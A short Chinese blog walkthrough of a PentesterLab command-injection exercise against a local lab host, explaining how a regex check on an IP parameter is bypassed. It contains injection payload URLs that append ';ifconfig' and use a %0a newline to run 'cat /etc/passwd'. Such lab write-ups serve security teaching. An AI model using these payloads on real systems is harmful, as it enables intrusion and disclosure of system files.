0
点赞
收藏
分享

微信扫一扫

PentestLab-web安全命令注入-EXP2


我们打开靶机

选择“Example 2”


PentestLab-web安全命令注入-EXP2_正则


观察页面


PentestLab-web安全命令注入-EXP2_正则_02


我们尝试


http://192.168.29.148/commandexec/example2.php?ip=127.0.0.1;ifconfig


结果


PentestLab-web安全命令注入-EXP2_IP_03


我们尝试%0a


PentestLab-web安全命令注入-EXP2_php_04


于是payload为


http://192.168.29.148/commandexec/example2.php?ip=127.0.0.1%0acat%20/etc/passwd


结果


PentestLab-web安全命令注入-EXP2_IP_05


我们观察靶机源码


PentestLab-web安全命令注入-EXP2_php_06


使用了正则来匹配IP地址

可以使用%0a进行截断

举报

相关推荐

0 条评论